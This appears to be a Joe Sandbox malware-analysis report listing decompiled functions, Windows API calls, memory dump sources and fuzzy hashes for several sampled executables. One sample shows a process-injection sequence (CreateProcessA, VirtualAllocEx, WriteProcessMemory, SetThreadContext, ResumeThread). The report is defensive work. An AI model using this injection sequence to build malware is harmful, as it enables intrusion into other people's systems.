CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
GetLastError.KERNEL32(000000F5), ref: 00403C1E

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D

Function 004053C4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE

Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A

Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B

Strings

:mm, xrefs: 004055C0
m/d/yy, xrefs: 004054AD
:mm:ss, xrefs: 004055DA
mmmm d, yyyy, xrefs: 004054CF
AMPM, xrefs: 004055A9

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C

Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
LocalFree.KERNEL32(005AA8A8,00000000,00401AB4), ref: 00401A1B
VirtualFree.KERNEL32(?,00000000,00008000,005AA8A8,00000000,00401AB4), ref: 00401A3A
LocalFree.KERNEL32(005AB8A8,?,00000000,00008000,005AA8A8,00000000,00401AB4), ref: 00401A79
RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D

Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
ExitProcess.KERNEL32 ref: 00403DE5

Strings

9@, xrefs: 00403D29, 00403D34
Error, xrefs: 00403D91
Runtime error at 00000000, xrefs: 00403D96, 00403DA9

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000$9@
API String ID: 1220098344-1503883590
Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E

Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD

Function 00406E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC

Strings

)q@, xrefs: 00406F3F, 00406E98, 00406EA8, 00406F04, 00406F28, 00406F18, 00406EEF

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: QueryValue
String ID: )q@
API String ID: 3660427363-2284170586
Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99

Function 00409C88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD

Strings

Setup, xrefs: 00409CAD
The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: Message
String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
API String ID: 2030045667-3271211647
Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068

Function 004030DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE

Strings

U1hd.@, xrefs: 00403103

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: CommandHandleLineModule
String ID: U1hd.@
API String ID: 2123368496-2904493091
Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD

Function 004094D8 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524

Memory Dump Source

Source File: 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2791714899.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2792833381.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.2793075016.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_kvOccCLzMNloI4W4GuGOaRuh.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

Analysis Process: v7u3knm8W6_1U6jDWPH31qsx.exePID: 7932, Parent PID: 7504COMMON

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	1

Executed Functions

Function 00434317 Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocaleInfoW.KERNELBASE ref: 0043435B

Memory Dump Source

Source File: 00000009.00000001.1628358661.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_401000_v7u3knm8W6_1U6jDWPH31qsx.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: e406fee116d59dc29bff918de52f47113fca1f0b6cdf1c0b79daca21ffa03787
Instruction ID: 288d1a82559983365061ea63ee3f0ed70ff3cd0e29cd478b0d7a5142fe49a74e
Opcode Fuzzy Hash: e406fee116d59dc29bff918de52f47113fca1f0b6cdf1c0b79daca21ffa03787
Instruction Fuzzy Hash: 22015F78604704AFD700DF58C484A99BBF4FF4D364F018599E9898B361D371E944DF81

Function 0040BA15 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4, xrefs: 0040BB53

Memory Dump Source

Source File: 00000009.00000001.1628358661.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_401000_v7u3knm8W6_1U6jDWPH31qsx.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 9e629b54cac9a451dd8cf4de9c3dc0aa672878143de544fc65e081d80f5981e0
Instruction ID: 06e1ceb854ef84b575a7962212db0659957610df23ecc174af10c1a64159b46f
Opcode Fuzzy Hash: 9e629b54cac9a451dd8cf4de9c3dc0aa672878143de544fc65e081d80f5981e0
Instruction Fuzzy Hash: E37148B8A04758DFCB10CF49D084A9EBBF0FB8D314F11855AE999AB360C374A945DF86

Function 00430AEC Relevance: 1.5, APIs: 1, Instructions: 24
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 00430B15

Memory Dump Source

Source File: 00000009.00000001.1628358661.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_401000_v7u3knm8W6_1U6jDWPH31qsx.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 18444469ac8201bf6d50be6c6be0363dfdef2a52ebe0a6938612de2b41c52623
Instruction ID: d2283895444e6816146f9e0c787f061a4248d8bcf6bdef5045bd93e0b988b077
Opcode Fuzzy Hash: 18444469ac8201bf6d50be6c6be0363dfdef2a52ebe0a6938612de2b41c52623
Instruction Fuzzy Hash: 6BF0A5B820170ADFCB04EF24C0C0946BBB6FB8A254B108694D9554B359D370EA85CBD1

Analysis Process: Zt2eeOHcoNwxYT3C9R8h67os.exePID: 7940, Parent PID: 7504COMMON

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	96
Total number of Limit Nodes:	4

Executed Functions

Function 05A46F7C Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05A4724F

Memory Dump Source

Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1009e22bb1a631b8529c2de560a93355d806abc9713ecbd5bfcc39db7d2bd118
Instruction ID: 93437513ebe398077c60f7303e38537cb83a54b31c0910164918dbe39d9c96a7
Opcode Fuzzy Hash: 1009e22bb1a631b8529c2de560a93355d806abc9713ecbd5bfcc39db7d2bd118
Instruction Fuzzy Hash: 7BC11771D012698FDB24CFA8C845BEEBBF1FB49300F0095A9D819B7250DB749A86CF95

Function 05A46F88 Relevance: 1.8, APIs: 1, Instructions: 321
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05A4724F

Memory Dump Source

Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 129b39828ed453574b5eaa3443a15227c7147df53b2a5312f3dfd3e611d82c5e
Instruction ID: 554999a3aa1bb2bcdcdfc209b4c33b3cc22150c42d0a6088d9b3f3b8f915129f
Opcode Fuzzy Hash: 129b39828ed453574b5eaa3443a15227c7147df53b2a5312f3dfd3e611d82c5e
Instruction Fuzzy Hash: 18C11671D002698FDB24CFA8C845BEEBBB1FB49300F0495A9D819B7250DB749A86CF95

Function 05A46BFB Relevance: 1.6, APIs: 1, Instructions: 117
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05A46CD3

Memory Dump Source

Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4907f536c116953e5ad5d0dd42e9fded5936519e38ecce4b8d3fa0ba58c21a19
Instruction ID: f39f400c5c9f573ab8344eeec43fbbde9fd0fb7fba33b97de7196c1d548811a3
Opcode Fuzzy Hash: 4907f536c116953e5ad5d0dd42e9fded5936519e38ecce4b8d3fa0ba58c21a19
Instruction Fuzzy Hash: 8341A8B5D012589FCF00CFA9D984AEEBBF1FB49310F14902AE819B7240D779AA45CF64

Function 05A46C00 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05A46CD3

Memory Dump Source

Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f2cb9d5bb954b30cdf1d63a493bfcfab947e759f08a396f39a9e79cf2e4ff2a4
Instruction ID: 8ea60c2b0d17d680b91f5905a6dc72f35294ea4d86b04ed7362c3d038066aa70
Opcode Fuzzy Hash: f2cb9d5bb954b30cdf1d63a493bfcfab947e759f08a396f39a9e79cf2e4ff2a4
Instruction Fuzzy Hash: E641A9B5D012589FCF00CFA9D984AEEFBF1BB49310F14902AE819B7240D779AA41CF64

Function 0175DCC0 Relevance: 1.6, APIs: 1, Instructions: 112
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?), ref: 0175DDC9

Memory Dump Source

Source File: 0000000A.00000002.1866675700.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1750000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: cd38ad7d8de70404f1dec894e3c281aa97f9760d6836c4d818d38e237f026563
Instruction ID: 861f57b3e5ff5ad92f8d96325fb29deb75ea141798c4396f493754fa36a09b86
Opcode Fuzzy Hash: cd38ad7d8de70404f1dec894e3c281aa97f9760d6836c4d818d38e237f026563
Instruction Fuzzy Hash: 7F41EEB4E003489FDB64CFE9D884B9DFBF1BB09304F10912AE814AB294D7B49885CF95

Function 05A46AE0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05A46B8A

Memory Dump Source

Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 669fd635395b06191b88052d265447b7557d154879ff4574ffa3153717fe3c10
Instruction ID: 7217a73eb4b23f491816e134d00b05f0bf9ea7643a7e2858af681be8c0ebd0dc
Opcode Fuzzy Hash: 669fd635395b06191b88052d265447b7557d154879ff4574ffa3153717fe3c10
Instruction Fuzzy Hash: 053188B9D042589FCF10CFA9D880ADEFBB1BB49310F10942AE815BB210D775A946CF69

Function 05A46AD8 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05A46B8A

Memory Dump Source

Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bac5de8312eb2f314162beed4e3ea44de79be7d83f5f40b0c89d9b7282110274
Instruction ID: 62b86d75b91d8613af6f523ca5d041bbad065ca16438a7674723ad4fe9affe29
Opcode Fuzzy Hash: bac5de8312eb2f314162beed4e3ea44de79be7d83f5f40b0c89d9b7282110274
Instruction Fuzzy Hash: 293197B9D04258DFCF10CFA9D984ADEFBB1BB49310F10942AE815BB200D775A946CF68

Function 05A469B8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 05A46A67

Memory Dump Source

Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c50c8955b8199ae492292965af2fdd5a87e250c46c7458c4c21f6ff3156b3628
Instruction ID: 700bed8b0d2177b75917e3c97ef088704c11ab85ebfa6486735d53e6025930a3
Opcode Fuzzy Hash: c50c8955b8199ae492292965af2fdd5a87e250c46c7458c4c21f6ff3156b3628
Instruction Fuzzy Hash: E431ACB5D052589FDB10CFAAD884AEEFBF1BF49310F24802AE415B7240D778A985CF64

Function 05A469B0 Relevance: 1.6, APIs: 1, Instructions: 93threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 05A46A67

Memory Dump Source

Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: fb207505cd5d9a11e79bf2023c8c63d3a1f53a0111a2b121fd544665667bc5c4
Instruction ID: 28e8d10125e68d8b0727a23c1d37fc7e89caf45f3e958655f03e6ee7756ce2d8
Opcode Fuzzy Hash: fb207505cd5d9a11e79bf2023c8c63d3a1f53a0111a2b121fd544665667bc5c4
Instruction Fuzzy Hash: 5C41BBB5D012589FDB10CFA9D984AEEFBF1BB49310F24842AE415B7240D778AA85CF64

Function 0175D9E8 Relevance: 1.6, APIs: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0175DA8F

Memory Dump Source

Source File: 0000000A.00000002.1866675700.0000000001750000.00000040.00000800.00020000.00000000.sdmp, Offset: 01750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1750000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c0907a277c560c99393c26d79638ffe82a4ba861656592d85106bc0f8b4364a7
Instruction ID: 7f04dac1c91502d228d0ee124e2a22361820fddd00679c8a798594ad814e8dcd
Opcode Fuzzy Hash: c0907a277c560c99393c26d79638ffe82a4ba861656592d85106bc0f8b4364a7
Instruction Fuzzy Hash: D63175B9D052589FCB10CFA9E880ADEFBF1BB09310F24902AE818B7310D775A945CF65

Function 05A468C8 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 05A46946

Memory Dump Source

Source File: 0000000A.00000002.2142169946.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5a40000_Zt2eeOHcoNwxYT3C9R8h67os.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8f7217c900aaf45725a4773e3e0325297497dfb9757627ad7e4740ed72a789e8
Instruction ID: f74f9b59279ddc91fba0ec47bc40002576a36e6c17425c8a748e13130aa27da7
Opcode Fuzzy Hash: 8f7217c900aaf45725a4773e3e0325297497dfb9757627ad7e4740ed72a789e8
Instruction Fuzzy Hash: 7731C9B4D052189FCF10CFAAD880A9EFBF4BB49320F14942AE815B7300C775A941CFA8

Function 05A468C0 Relevance: 1.6, APIs: 1, Instructions: 72threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 05A46946

Memory Dump Source

